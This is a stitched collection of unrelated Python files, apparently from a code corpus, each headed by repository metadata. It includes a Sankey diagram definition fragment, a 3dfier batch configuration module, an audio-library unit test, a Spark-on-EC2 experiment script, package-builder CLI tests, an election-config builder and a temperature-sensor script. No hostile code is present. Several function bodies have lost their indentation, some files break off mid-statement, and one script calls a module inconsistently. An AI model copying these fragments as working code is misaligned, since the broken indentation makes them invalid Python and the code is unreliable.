    flow_selection = attr.ib(default=None)
    flow_partition = attr.ib(default=None)
    time_partition = attr.ib(default=None)

    def copy(self):
        """Return a copy with shallow-copied nodes and bundles.

        Bug fix: flow_selection and flow_partition were previously passed in
        swapped positions, silently exchanging the two on every copy.
        """
        return self.__class__(self.nodes.copy(), self.bundles.copy(),
                              self.ordering, self.flow_selection,
                              self.flow_partition, self.time_partition)

    def to_code(self):
        """Render this definition as runnable Python source code."""
        nodes = "\n".join(
            "    %s: %s," % (repr(k), pformat(v)) for k, v in self.nodes.items()
        )
        ordering = "\n".join(
            "    %s," % repr([list(x) for x in layer]) for layer in self.ordering.layers
            # convert to list just because it looks neater
        )
        bundles = "\n".join(
            "    %s," % pformat(bundle) for bundle in self.bundles.values()
        )
        if self.flow_selection is not None:
            flow_selection = "flow_selection = %s\n\n" % pformat(self.flow_selection)
        else:
            flow_selection = ""
        if self.flow_partition is not None:
            flow_partition = "flow_partition = %s\n\n" % pformat(self.flow_partition)
        else:
            flow_partition = ""
        if self.time_partition is not None:
            time_partition = "time_partition = %s\n\n" % pformat(self.time_partition)
        else:
            time_partition = ""
        # Bug fix: the generated call previously read "time_parititon", a
        # misspelling that made the emitted code raise NameError when run.
        code = dedent("""
        from floweaver import (
            ProcessGroup,
            Waypoint,
            Partition,
            Group,
            Elsewhere,
            Bundle,
            SankeyDefinition,
        )

        nodes = {
        %s
        }

        ordering = [
        %s
        ]

        bundles = [
        %s
        ]

        %s%s%ssdd = SankeyDefinition(nodes, bundles, ordering%s%s%s)
        """) % (
            nodes,
            ordering,
            bundles,
            flow_selection,
            flow_partition,
            time_partition,
            (", flow_selection=flow_selection" if flow_selection else ""),
            (", flow_partition=flow_partition" if flow_partition else ""),
            (", time_partition=time_partition" if time_partition else "")
        )
        return code
# ProcessGroup
def _validate_direction(instance, attribute, value):
if value not in 'LR':
raise ValueError('direction must be L or R')
@no_default_vals_in_repr
@attr.s(slots=True)
class ProcessGroup(object):
    """A ProcessGroup represents a group of processes from the underlying dataset.

    The processes to include are defined by the `selection`. By default they
    are all lumped into one node in the diagram, but by defining a `partition`
    this can be controlled.

    Attributes
    ----------
    selection : list or string
        If a list of strings, they are taken as process ids.
        If a single string, it is taken as a Pandas query string run against the
        process table.
    partition : Partition, optional
        Defines how to split the ProcessGroup into subgroups.
    direction : 'R' or 'L'
        Direction of flow, default 'R' (left-to-right).
    title : string, optional
        Label for the ProcessGroup. If not set, the ProcessGroup id will be used.
    """
    # NOTE: attr.ib declaration order defines the generated __init__ signature.
    selection = attr.ib(default=None)
    partition = attr.ib(default=None)
    direction = attr.ib(validator=_validate_direction, default='R')
    title = attr.ib(
        default=None,
        validator=attr.validators.optional(attr.validators.instance_of(str)))
# Waypoint
@no_default_vals_in_repr
@attr.s(slots=True)
class Waypoint(object):
    """A Waypoint represents a control point along a :class:`Bundle` of flows.

    There are two reasons to define Waypoints: to control the routing of
    :class:`Bundle` s of flows through the diagram, and to split flows according
    to some attributes by setting a `partition`.

    Attributes
    ----------
    partition : Partition, optional
        Defines how to split the Waypoint into subgroups.
    direction : 'R' or 'L'
        Direction of flow, default 'R' (left-to-right).
    title : string, optional
        Label for the Waypoint. If not set, the Waypoint id will be used.
    """
    # NOTE: attr.ib declaration order defines the generated __init__ signature.
    partition = attr.ib(default=None)
    direction = attr.ib(validator=_validate_direction, default='R')
    title = attr.ib(
        default=None,
        validator=attr.validators.optional(attr.validators.instance_of(str)))
# Bundle
Elsewhere = sentinel.create('Elsewhere')
def _validate_flow_selection(instance, attribute, value):
if instance.source == instance.target and not value:
raise ValueError('flow_selection is required for bundle with same '
'source and target')
@no_default_vals_in_repr
@attr.s(frozen=True, slots=True)
class Bund
|
balazsdukai/batch3dfier
|
batch3dfier/config.py
|
Python
|
gpl-3.0
| 20,894
| 0.000814
|
# -*- coding: utf-8 -*-
"""Configure batch3dfier with the input data."""
import os.path
from subprocess import call
from shapely.geometry import shape
from shapely import geos
from psycopg2 import sql
import fiona
def call_3dfier(db, tile, schema_tiles,
                pc_file_name, pc_tile_case, pc_dir,
                table_index_pc, fields_index_pc,
                table_index_footprint, fields_index_footprint, uniqueid,
                extent_ewkb, clip_prefix, prefix_tile_footprint,
                yml_dir, tile_out, output_format, output_dir,
                path_3dfier, thread):
    """Call 3dfier with the YAML config created by yamlr().

    Note
    ----
    For the rest of the parameters see batch3dfier_config.yml.

    Parameters
    ----------
    db : db Class instance
    tile : str
        Name of the 2D tile.
    schema_tiles : str
        Schema of the footprint tiles.
    pc_file_name : str
        Naming convention for the pointcloud files ('dataset_name').
    pc_tile_case : str
        How string matching is done for pc_file_name ('tile_case').
    pc_dir : str
        Directory of the pointcloud files ('dataset_dir').
    thread : str
        Name/ID of the active thread.
    extent_ewkb : str
        EWKB representation of 'extent' in batch3dfier_config.yml.
    clip_prefix : str
        Prefix for naming the clipped/united views. This value shouldn't be a
        substring of the pointcloud file names.
    prefix_tile_footprint : str or None
        Prefix prepended to the footprint tile view names. If None, the views
        are named as the values in fields_index_footprint['unit_name'].

    Returns
    -------
    dict
        {'tile_skipped': <tile name or None>, 'out_path': <path or None>}.
        A tile is skipped when no matching pointcloud file exists or 3dfier
        fails to run on it.
    """
    pc_tiles = find_pc_tiles(db, table_index_pc, fields_index_pc,
                             table_index_footprint, fields_index_footprint,
                             extent_ewkb, tile_footprint=tile,
                             prefix_tile_footprint=prefix_tile_footprint)
    pc_path = find_pc_files(pc_tiles, pc_dir, pc_file_name, pc_tile_case)
    # Prepare output file name.
    if not tile_out:
        tile_out = tile.replace(clip_prefix, '', 1)

    if not pc_path:
        print(
            "\nPointcloud file(s) " +
            str(pc_tiles) +
            " not available. Skipping tile.\n")
        return {'tile_skipped': tile, 'out_path': None}

    # Each thread gets its own YAML file so one thread doesn't overwrite the
    # config while another is still using it.
    yml_path = os.path.join(yml_dir, thread + "_config.yml")
    config = yamlr(dbname=db.dbname, host=db.host, user=db.user,
                   pw=db.password, schema_tiles=schema_tiles,
                   bag_tile=tile, pc_path=pc_path,
                   output_format=output_format, uniqueid=uniqueid)
    # Write temporary config file.
    try:
        with open(yml_path, "w") as text_file:
            text_file.write(config)
    except BaseException:
        print("Error: cannot write _config.yml")

    # Derive the output file name from the requested format.
    fmt = output_format.lower()
    if "obj" in fmt:
        output_path = os.path.join(output_dir, tile_out + ".obj")
    elif "csv" in fmt:
        output_path = os.path.join(output_dir, tile_out + ".csv")
    else:
        output_path = os.path.join(output_dir, tile_out)

    # Run 3dfier.
    command = (path_3dfier + " {yml} -o {out}").format(
        yml=yml_path, out=output_path)
    try:
        call(command, shell=True)
    except BaseException:
        # BUG FIX: previously a failed 3dfier run set tile_skipped but then
        # fell through to the success return, reporting a bogus out_path.
        print("\nCannot run 3dfier on tile " + tile)
        return {'tile_skipped': tile, 'out_path': None}

    return {'tile_skipped': None, 'out_path': output_path}
def yamlr(dbname, host, user, pw, schema_tiles,
          bag_tile, pc_path, output_format, uniqueid):
    """Render the YAML config string that 3dfier is driven with.

    Parameters
    ----------
    See batch3dfier_config.yml.

    Returns
    -------
    string
        the YAML config file for 3dfier
    """
    # YAML list of pointcloud dataset paths; with several paths each entry
    # keeps a trailing continuation indent after the newline.
    if len(pc_path) > 1:
        pc_dataset = "".join("- " + p + "\n" + " " for p in pc_path)
    else:
        pc_dataset = "- " + pc_path[0]
    # !!! Do not correct the indentation of the config template, otherwise it
    # results in 'YAML::TypedBadConversion<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > >'
    # because every line is indented as here
    config = """
input_polygons:
  - datasets:
      - "PG:dbname={dbname} host={host} user={user} password={pw} schemas={schema_tiles} tables={bag_tile}"
    uniqueid: {uniqueid}
    lifting: Building

lifting_options:
  Building:
    height_roof: percentile-90
    height_floor: percentile-10
    lod: 1

input_elevation:
  - datasets:
      {pc_path}
    omit_LAS_classes:
    thinning: 0

options:
  building_radius_vertex_elevation: 2.0
  radius_vertex_elevation: 1.0
  threshold_jump_edges: 0.5

output:
  format: {output_format}
  building_floor: true
  vertical_exaggeration: 0
""".format(dbname=dbname,
           host=host,
           user=user,
           pw=pw,
           schema_tiles=schema_tiles,
           bag_tile=bag_tile,
           uniqueid=uniqueid,
           pc_path=pc_dataset,
           output_format=output_format)
    return config
def find_pc_files(pc_tiles, pc_dir, pc_file_name, pc_tile_case):
    """Find pointcloud files on disk for a list of pointcloud tile names.

    Parameters
    ----------
    pc_tiles : list of str
        Pointcloud tile names.
    pc_dir : str
        Directory containing the pointcloud files.
    pc_file_name : str
        Filename template with a '{tile}' placeholder.
    pc_tile_case : str
        One of 'upper', 'lower', 'mixed' -- how tile names are cased.

    Returns
    -------
    list of str or None
        Full paths when every file exists, otherwise None.

    Raises
    ------
    ValueError
        For an unrecognised pc_tile_case.
    """
    # Prepare AHN file names.
    if pc_tile_case == "upper":
        tiles = [pc_file_name.format(tile=t.upper()) for t in pc_tiles]
    elif pc_tile_case == "lower":
        tiles = [pc_file_name.format(tile=t.lower()) for t in pc_tiles]
    elif pc_tile_case == "mixed":
        tiles = [pc_file_name.format(tile=t) for t in pc_tiles]
    else:
        # BUG FIX: the original raised a plain string, which is a TypeError
        # in Python 3 (exceptions must derive from BaseException).
        raise ValueError(
            "Please provide one of the allowed values for pc_tile_case.")
    # Use the tile list to parse the pointcloud file names.
    pc_path = [os.path.join(pc_dir, pc_tile) for pc_tile in tiles]
    if all(os.path.isfile(p) for p in pc_path):
        return pc_path
    return None
def find_pc_tiles(db, table_index_pc, fields_index_pc,
table_index_footprint=None, fields_index_footprint=None,
extent_ewkb=None, tile_footprint=None,
prefix_tile_footprint=None):
"""Find pointcloud tiles in tile index that intersect the extent or the footprint tile.
Parameters
----------
prefix_tile_footprint : str or None
Prefix prepended to the footprint tile view names. If None, the views are named as
the values in fields_index_fooptrint['unit_name'].
"""
if extent_ewkb:
tiles = get_2Dtiles(db, table_index_pc, fields_index_pc, extent_ewkb)
else:
schema_pc_q = sql.Identifier(table_index_pc['schema'])
table_pc_q = sql.Identifier(table_index_pc['table'])
field_pc_geom_q = sql.Identifier(fields_index_pc['geometry'])
field_pc_unit_q = sql.Identifier(fields_index_pc['unit_name'])
schema_ftpr_q = sql.Identifier(table_index_footprint['schema'])
table_ftpr_q = sql.Identifier(table_index_footprint['table'])
field_ftpr_geom_q = sql.Identifier(fields_index_footprint['geometry'])
field_ftpr_unit_q = sql.Identifier(fields_index_footprint['unit_name'])
if prefix_tile_footprint:
tile_footprint = tile_footprint.replace(
prefix_tile_footprint, '', 1)
tile_q = sql.Literal(tile_footprint)
query = sql.SQL("""
SELECT
{table_pc}.{field_pc_unit}
|
MTG/essentia
|
test/src/unittests/highlevel/test_coversongsimilarity.py
|
Python
|
agpl-3.0
| 3,115
| 0.004815
|
#!/usr/bin/env python
# Copyright (C) 2006-2017 Music Technology Group - Universitat Pompeu Fabra
#
# This file is part of Essentia
#
# Essentia is free software: you can redistribute it and/or modify it under
# the terms of the GNU Affero General Public License as published by the Free
# Software Foundation (FSF), either version 3 of the License, or (at your
# option) any later version.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# You should have received a copy of the Affero GNU General Public License
# version 3 along with this program. If not, see http://www.gnu.org/licenses/
from essentia_test import *
class TestCoverSongSimilarity(TestCase):
    """Unit tests for the essentia CoverSongSimilarity algorithm."""

    # Pre-defined binary similarity matrix used as the test input.
    sim_matrix = array([[1, 0, 0, 0, 1, 1, 1, 0, 0, 0, 1, 1],
                        [0, 0, 0, 0, 0, 1, 1, 0, 1, 1, 1, 1],
                        [1, 1, 1, 1, 1, 0, 0, 0, 0, 1, 0, 1],
                        [1, 0, 1, 1, 1, 0, 0, 0, 1, 1, 0, 0],
                        [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
                        [0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 1, 1]])
    # Expected cover-song similarity distance for the matrix above.
    expected_distance = 1.732

    def testEmpty(self):
        self.assertComputeFails(CoverSongSimilarity(), [])

    def testRegressionStandard(self):
        '''Test regression of CoverSongSimilarity algorithm in standard mode'''
        score_matrix, distance = CoverSongSimilarity().compute(self.sim_matrix)
        self.assertAlmostEqualFixedPrecision(self.expected_distance, distance)
        shape_warning = ("Expected shape of output score_matrix is %s, instead of %s"
                         % (self.sim_matrix.shape, score_matrix.shape))
        self.assertEqual(score_matrix.shape[0], self.sim_matrix.shape[0], shape_warning)
        self.assertEqual(score_matrix.shape[1], self.sim_matrix.shape[1], shape_warning)

    def testInvalidParam(self):
        self.assertConfigureFails(CoverSongSimilarity(), {'distanceType': 'test'})
        self.assertConfigureFails(CoverSongSimilarity(), {'alignmentType': 'test'})

    def testRegressionStreaming(self):
        '''Test regression of CoverSongSimilarity algorithm in streaming mode'''
        from essentia.streaming import CoverSongSimilarity as CoverSongSimilarityStreaming
        matrix_input = VectorInput(self.sim_matrix)
        streaming_sim = CoverSongSimilarityStreaming(pipeDistance=True)
        pool = Pool()
        # Wire the network: input matrix -> algorithm -> pool outputs.
        matrix_input.data >> streaming_sim.inputArray
        streaming_sim.scoreMatrix >> (pool, 'scoreMatrix')
        streaming_sim.distance >> (pool, 'distance')
        # Run the algorithm network and check the last reported distance.
        run(matrix_input)
        self.assertAlmostEqualFixedPrecision(self.expected_distance, pool['distance'][-1])
# Collect all tests from this module into one suite; verbose runner is used
# when the file is executed directly.
suite = allTests(TestCoverSongSimilarity)

if __name__ == '__main__':
    TextTestRunner(verbosity=2).run(suite)
|
jtian0/project-platform
|
conduct.py
|
Python
|
mit
| 5,372
| 0.001303
|
#!/usr/bin/env python3
from thesis import Submit
import time
import logging
import signal
import threading
import boto.ec2
import multiprocessing as mp
import subprocess as sp
from pprint import pprint
from thesis import Propagator
from thesis import Pattern
from thesis import Parser
from thesis import Console
__author__ = 'Jiannan Tian'
# cmd
_start_all = "\'/root/spark/sbin/start-all.sh > /dev/null\'"
_stop_all = "\'/root/spark/sbin/stop-all.sh > /dev/null\'"
_pkill = "\'pkill -f spark\'"
# logging
logging.basicConfig(level=logging.INFO,
format=Console.color_text('[%(threadName)-10s][%(levelname)s]\t',
'%(message)s'))
def cluster_init(conn):
    """Run the cluster init script on the Spark master node over SSH.

    Finds the running EC2 instance in the 'spark-cluster-master' security
    group and executes conf_init.sh on it.
    """
    running = [i for i in Console.instance_get_all(conn, instance_ids=None)
               if i.state == u'running']
    masters = [i for i in running if i.groups[0].name == 'spark-cluster-master']
    enable_history = Propagator.ssh_cmd(masters[0].public_dns_name,
                                        'sh /root/project-platform/conf_init.sh')
    sp.check_call(enable_history, shell=True)
def dispatcher_no_pattern(task_id, conn, opts, graph_gen=False,
                          data_exportable=False):
    """Run one submission without an availability pattern, polling until done."""
    # NOTE(review): this calls Submit.Submit(...) while dispatcher() calls
    # Submit(...) directly -- presumably only one spelling matches the
    # 'from thesis import Submit' import; confirm against the thesis package.
    submitter = Submit.Submit(opts)
    submission = mp.Process(name="submission-%s" % task_id,
                            target=submitter.commit)
    submission.start()
    while submission.is_alive():
        time.sleep(opts.interval)
        logging.info("Submission is still in progress...")
    # for termination
    try:
        time.sleep(0.1)  # delay
    except mp.ProcessError:
        pass
def dispatcher(task_id, conn, opts, graph_gen=False, data_exportable=False):
    """
    will be called its .join() to block thread in next iteration
    process instead of thread for unconditional termination
    """
    # Availability pattern that drives executor churn for this task.
    p = Pattern.AvailabilityPattern(task_id=str(task_id), amplitude=opts.amplitude,
                                    mean=opts.mean, end=opts.end)
    if graph_gen:
        threading.Thread(name="graph_gen-%s" % task_id, target=p.graph).start()
    propagator = Propagator.Propagator(conn, p)
    propagator.executor_reset()
    propagator.driver_initialize(opts)
    # The pattern driver runs in its own process so it can be terminated
    # unconditionally once the submission finishes.
    propagator_run = mp.Process(name="pattern-{}".format(task_id), target=propagator.driver, args=(opts,))
    propagator_run.start()
    # NOTE(review): dispatcher_no_pattern() uses Submit.Submit(opts) while
    # this uses Submit(opts) -- presumably only one spelling is correct.
    s = Submit(opts)
    submit = mp.Process(name="submission-%s" % task_id, target=s.commit)
    submit.start()
    # Poll until the submission child exits.
    while submit.is_alive():
        time.sleep(opts.interval)
        logging.info("Submission is still in progress...")
    # for termination
    try:
        propagator_run.terminate()
        time.sleep(0.1)  # delay
    except mp.ProcessError:
        pass
    if propagator_run.exitcode == -signal.SIGTERM:
        logging.info("Submission is shorter than given pattern time.")
    filename = 'ephemeral_files/graph_%s_%s.txt' % (task_id, p.timestamp)
    if data_exportable:
        # Dump the pattern series (and elapsed time on success) for plotting.
        with open(filename, 'w') as f:
            f.write('t_%s = ' % task_id + repr(p.t) + '\n')
            f.write('y_%s = ' % task_id + repr(p.y) + '\n')
            f.write('y_d_%s = ' % task_id + repr(p.y_d) + '\n')
            while submit.is_alive():
                time.sleep(5)
            if submit.exitcode == 0:
                f.write('time_%s = ' % task_id + repr(s.time_elapsed) + '\n')
            f.close()  # redundant inside 'with'; kept as-is
def dispatcher_wrapper(conn, task_id, opts, avai_pattern_enable=True):
    """Run one submission end-to-end in a child process and log its duration.

    Dispatches to dispatcher() (with availability pattern) or
    dispatcher_no_pattern() (without) and blocks until the child finishes.
    """
    logging.info('Timestamp: %s' % Pattern.timestamp)
    logging.info('Starting submission #%s' % task_id)
    start = time.time()
    kwargs = {'task_id': task_id, 'conn': conn, 'opts': opts,
              'graph_gen': True, 'data_exportable': True}
    if avai_pattern_enable:
        d = mp.Process(target=dispatcher, kwargs=kwargs)
    else:
        # BUG FIX: the no-pattern branch previously built a kwargs dict with
        # an unsupported 'no_avail_pattern' key but then created the Process
        # without any kwargs at all, crashing the child on missing arguments.
        # Route it to dispatcher_no_pattern with the shared kwargs instead.
        d = mp.Process(target=dispatcher_no_pattern, kwargs=kwargs)
    d.start()
    d.join()
    elapsed = time.time() - start
    logging.info('Submission #%s finished, p%s_i%s, taking %.6f seconds'
                 % (task_id, opts.partition, opts.iteration, elapsed))
def main():
    """Entry point: connect to EC2, parse CLI arguments and run the
    requested action (run / debug / diagnostic / stop-all)."""
    conn = boto.ec2.connect_to_region("us-east-1")
    opts, _action = Parser.experiment_parse_args()
    # Best-effort cleanup of bytecode caches before the run.
    try:
        sp.check_call("rm -fr __pycache__ && rm *.pyc", shell=True)
    except sp.CalledProcessError:
        pass
    cluster_init(conn)
    if _action[0] == 'run':
        for task_id in range(opts.reps):
            dispatcher_wrapper(conn, task_id, opts)
    if _action[0] == 'measure-checkpointing-time':
        pass
    if _action[0] in ('debug', 'd'):
        pprint(opts.__dict__)
    if _action[0] == 'diagnostic':
        diagnostic = Propagator.Propagator(conn)
        if _action[1] == 'reset':
            diagnostic.executor_reset()
        if _action[1] == 'start-all':
            master_ip = diagnostic.master_ip
            sp.check_call(Propagator.ssh_cmd(master_ip, _start_all), shell=True)
    if _action[0] == 'stop-all':
        # BUG FIX: 'diagnostic' was only bound inside the 'diagnostic' branch,
        # so 'stop-all' raised NameError; build the helper here as well.
        diagnostic = Propagator.Propagator(conn)
        master_ip = diagnostic.master_ip
        sp.check_call(Propagator.ssh_cmd(master_ip, _stop_all), shell=True)
if __name__ == '__main__':
main()
|
nottimbergling/isREAL-ui
|
backend/entities/base_request.py
|
Python
|
mit
| 292
| 0.010274
|
class BaseRequest(object):
    """Thin wrapper around a raw request dict with validation helpers."""

    def __init__(self, raw_request_dict):
        # A falsy body (None, empty dict, ...) is normalised to an empty dict.
        self.body = raw_request_dict or {}

    def validate_scheme(self, scheme):
        """Validate the body against *scheme* (delegates to scheme.validate)."""
        scheme.validate(self.body)

    def get_value(self, key):
        """Return body[key]; raises KeyError when the key is absent."""
        return self.body[key]
|
Undeterminant/archlinux-metapkg
|
run_tests.py
|
Python
|
cc0-1.0
| 5,479
| 0.000183
|
from click.testing import CliRunner
from contextlib import contextmanager
from metapkg import main as metapkg_main
from unittest import TestCase, main
import os
import metapkg as mp
class TestBuilds(TestCase):
    """Fixture-driven checks that a METABUILD input produces the expected
    PKGBUILD (or, for *_error directories, the expected error message)."""

    def setUp(self):
        self.maxDiff = None

    def assertValidPKGBUILD(self, directory):
        meta = self.grab_file(directory + '/METABUILD')
        if directory.endswith('_error'):
            # Error fixture: building must fail with exactly the recorded text.
            expected_error = self.grab_file(directory + '/error')
            with self.assertRaises(mp.MetapkgError) as ctx:
                mp.quick_metapkg(meta)
            self.assertEqual(str(ctx.exception).rstrip(), expected_error.rstrip())
        else:
            expected_pkg = self.grab_file(directory + '/PKGBUILD')
            self.assertEqual(mp.quick_metapkg(meta), expected_pkg)

    def grab_file(self, name):
        """Return a file's contents, or '' when it cannot be opened."""
        try:
            with open(name) as fh:
                return fh.read()
        except OSError:
            return ''
class TestStrings(TestCase):
    """Checks of Statement and Package str()/repr() formatting."""

    def setUp(self):
        self.maxDiff = None
        # Representative Statement: arch-restricted 'desc' directive on two
        # meta-packages with two data values.
        self.testStatement = mp.Statement()
        self.testStatement.directive = 'desc'
        self.testStatement.arch.append('x86_64')
        self.testStatement.names.extend(('meta-first', 'meta-second'))
        self.testStatement.data.extend(('base', 'base-devel'))
        # Representative fully-populated Package.
        self.testPackage = mp.Package()
        self.testPackage.desc = 'Description'
        self.testPackage.ver = 1.0
        self.testPackage.rel = 1
        self.testPackage.deps = {'pacman'}
        self.testPackage.optdeps = {'linux'}
        self.testPackage.provides = {'meta-package'}
        self.testPackage.arch = {'x86_64'}

    def test_Statement_str(self):
        self.assertEqual(str(self.testStatement), """\
.arch x86_64: .desc meta-first meta-second = base base-devel\
""")

    def test_Statement_repr(self):
        self.assertEqual(repr(self.testStatement), """Statement(\
arch = ['x86_64'], \
directive = 'desc', \
names = ['meta-first', 'meta-second'], \
data = ['base', 'base-devel']\
)""")

    def test_Package_repr(self):
        self.assertEqual(repr(self.testPackage), """Package(\
desc = 'Description', \
ver = 1.0, \
rel = 1, \
deps = {'pacman'}, \
optdeps = {'linux'}, \
provides = {'meta-package'}, \
arch = {'x86_64'})\
""")
class TestCLI(TestCase):
    """End-to-end tests of the metapkg command-line interface, executed in an
    isolated scratch filesystem via click's CliRunner."""

    def setUp(self):
        self.maxDiff = None

    @contextmanager
    def runCLI(self, args=None, input=None, mb=None, pb=None):
        """Invoke the CLI in a scratch directory, optionally pre-seeding
        METABUILD and/or PKGBUILD files, and yield the click result.

        BUG FIX: 'args' previously used a mutable default ([]), which is
        shared across calls; default to None and normalise inside.
        """
        args = [] if args is None else args
        runner = CliRunner()
        with runner.isolated_filesystem():
            if mb:
                with open('METABUILD', 'w') as f:
                    print(mb, file=f)
            if pb:
                with open('PKGBUILD', 'w') as f:
                    print(pb, file=f)
            yield runner.invoke(metapkg_main, args, input)

    def assertGeneratedPKGBUILD(self, metabuild):
        with open('PKGBUILD') as f:
            self.assertEqual(f.read(), mp.quick_metapkg(metabuild))

    def assertException(self, result, exc):
        self.assertEqual(result.exception, exc)
        self.assertNotEqual(result.exit_code, 0)

    def assertNoException(self, result):
        self.assertEqual(result.exception, None)
        self.assertEqual(result.exit_code, 0)

    def assertOutput(self, result, output):
        self.assertEqual(result.output, output)

    def test_empty_dir(self):
        with self.runCLI() as result:
            self.assertException(result, mp.METABUILDError())

    def test_valid_metabuild(self):
        with self.runCLI(mb='meta-package = pacman') as result:
            self.assertGeneratedPKGBUILD('meta-package = pacman')
            self.assertNoException(result)

    def test_force_pkgbuild(self):
        with self.runCLI(['-f'], mb='meta-package = pacman') as result:
            self.assertGeneratedPKGBUILD('meta-package = pacman')
            self.assertNoException(result)

    def test_pkgbuild_exists(self):
        with self.runCLI(mb='meta-package=pacman', pb='\n') as result:
            self.assertException(result, mp.PKGBUILDError())

    def test_stdout(self):
        with self.runCLI(['-O'], mb='meta-package=pacman') as result:
            self.assertOutput(result,
                              mp.quick_metapkg('meta-package = pacman'))
            self.assertNoException(result)

    def test_stdin(self):
        with self.runCLI(['-I'], input='meta-package=pacman') as result:
            self.assertGeneratedPKGBUILD('meta-package = pacman')
            self.assertNoException(result)

    def test_invalid_package_add(self):
        with self.runCLI(mb='meta-package=totally-not-package') as result:
            self.assertException(result, mp.InvalidPackageError(
                'totally-not-package', 'meta-package'
            ))

    def test_invalid_package_remove(self):
        with self.runCLI(mb='meta-package = - linux') as result:
            self.assertException(result, mp.InvalidPackageError(
                'linux', 'meta-package', True
            ))

    def test_syntax_error(self):
        with self.runCLI(mb='meta-package =') as result:
            self.assertException(
                result,
                mp.ParseError("last statement is incomplete on line 2, col 0")
            )
# Enable the library's test hooks before generating fixture tests.
mp._TESTING = True

# Generate one TestBuilds method per fixture directory under tests/.
for subdir in os.listdir('tests'):
    def run_test(self, directory='tests/' + subdir):
        # 'directory' is bound as a default argument on purpose: a plain
        # closure over 'subdir' would late-bind to the last loop value.
        self.assertValidPKGBUILD(directory)
    run_test.__name__ = 'test_' + subdir
    setattr(TestBuilds, run_test.__name__, run_test)
del run_test

if __name__ == '__main__':
    main()
|
dpausp/arguments
|
src/ekklesia_portal/lib/vvvote/election_config.py
|
Python
|
agpl-3.0
| 2,273
| 0.00264
|
import datetime
from uuid import uuid4
import ekklesia_portal.li
|
b.vvvote.schema as vvvote_schema
def ballot_to_vvvote_question(ballot, question_id=1):
    """Convert a ballot into a vvvote Question with yes/no + score schemes."""
    yes_no_scheme = vvvote_schema.YesNoScheme(
        name='yesNo', abstention=True, abstentionAsNo=False, quorum=2,
        mode=vvvote_schema.SchemeMode.QUORUM
    )
    score_scheme = vvvote_schema.ScoreScheme(name='score', minScore=0, maxScore=3)
    voting_scheme = [yes_no_scheme, score_scheme]

    options = []
    for option_id, proposition in enumerate(ballot.propositions, start=1):
        options.append(vvvote_schema.Option(
            optionID=option_id,
            proponents=[supporter.name for supporter in proposition.supporters],
            optionTitle=proposition.title,
            optionDesc=proposition.content,
            reasons=proposition.motivation,
        ))

    # A single-proposition ballot is labelled by that proposition's title;
    # otherwise the ballot's own name is used.
    if len(ballot.propositions) == 1:
        question_wording = ballot.propositions[0].title
    else:
        question_wording = ballot.name

    return vvvote_schema.Question(
        questionWording=question_wording, questionID=question_id,
        scheme=voting_scheme, options=options,
        findWinner=['yesNo', 'score', 'random']
    )
def voting_phase_to_vvvote_election_config(module_config, phase) -> vvvote_schema.ElectionConfig:
    """Build a vvvote ElectionConfig for a voting phase.

    Registration and voting both span the 14 days ending at the phase's
    target date.
    """
    questions = [ballot_to_vvvote_question(ballot, number)
                 for number, ballot in enumerate(phase.ballots, start=1)]
    end = phase.target
    start = end - datetime.timedelta(days=14)
    auth_data = vvvote_schema.OAuthConfig(
        eligible=module_config["must_be_eligible"],
        external_voting=True,
        verified=module_config["must_be_verified"],
        nested_groups=[module_config["required_role"]],
        serverId=module_config["auth_server_id"],
        RegistrationStartDate=start,
        RegistrationEndDate=end,
        VotingStart=start,
        VotingEnd=end,
    )
    return vvvote_schema.ElectionConfig(
        electionId=str(uuid4()),
        electionTitle=phase.title or phase.name or phase.phase_type.name,
        tally=vvvote_schema.Tally.CONFIGURABLE,
        auth=vvvote_schema.Auth.OAUTH,
        authData=auth_data,
        questions=questions
    )
|
Choko256/pysfmlengine
|
util.py
|
Python
|
gpl-3.0
| 528
| 0.035985
|
#-*- coding:utf-8 -*-
class EventThrower:
    """Minimal publish/subscribe event mixin.

    Callbacks are registered per event name with a priority and invoked
    highest-priority-first when the event is triggered.
    """

    def __init__(self):
        # event name -> list of {'fct': callable, 'priority': int},
        # kept sorted by descending priority.
        self.events = {}

    def on(self, name, callback, priority=99):
        """Register *callback* for event *name*.

        BUG FIX: the original only appended when the event name already
        existed in self.events, so the FIRST listener registered for any
        event was silently dropped.
        """
        self.events.setdefault(name, []).append({
            'fct': callback,
            'priority': priority,
        })
        # Highest priority first.
        self.events[name].sort(key=lambda entry: entry['priority'], reverse=True)

    def off(self, name):
        """Remove every listener for event *name* (no-op when unknown)."""
        if name in self.events:
            del self.events[name]

    def trigger(self, name, **kwargs):
        """Invoke all listeners for *name*, passing this thrower plus kwargs."""
        for listener in self.events.get(name, []):
            listener['fct'](self, **kwargs)
|
tommybobbins/velpi
|
utilities/redis_sensor.py
|
Python
|
gpl-2.0
| 2,563
| 0.017948
|
#!/usr/bin/python
# Modified 30-Oct-2013
# tng@chegwin.org
# Retrieve:
# 1: current temperature from a TMP102 sensor
# 2: Send to redis
import sys,time
from sys import path
import datetime
from time import sleep
import re
import redis
time_to_live = 3600
###### IMPORTANT #############
###### How close to comfortable temperature is this sensor
###### determines how much weighting this sensor
###### if used at an extreme point in the house (say cellar), set to 1
###### if used centrally (living room), set to 3 or 4
multiplier = 1
#import crankers
sys.path.append("/usr/local/lib/python2.7/site-packages/Adafruit-Raspberry-Pi-Python-Code/Adafruit_I2C/")
from Adafruit_I2C import Adafruit_I2C
redthis = redis.StrictRedis(host='433host',port=6379, db=0, socket_timeout=3)
room_location="cellar"
sensor_name="temperature/"+room_location+"/sensor"
mult_name="temperature/"+room_location+"/multiplier"
#print ("Sensor name is %s" % sensor_name)
#print ("Multiplier name is %s" % mult_name)
class Tmp102:
  """Driver for a TI TMP102 I2C temperature sensor (via Adafruit_I2C)."""
  i2c = None
  # Constructor
  def __init__(self, address=0x48, mode=1, debug=False):
    self.i2c = Adafruit_I2C(address, debug=debug)
    self.address = address
    self.debug = debug
    # Make sure the specified mode is in the appropriate range.
    if ((mode < 0) | (mode > 3)):
      if (self.debug):
        print("Invalid Mode: Using STANDARD by default")
      # Bug fix: the original assigned self.__BMP085_STANDARD, a constant
      # from the BMP085 driver this code was adapted from; that attribute
      # does not exist on Tmp102 and raised AttributeError.  Fall back to
      # the default mode (1) instead.
      self.mode = 1
    else:
      self.mode = mode
  def readRawTemp(self):
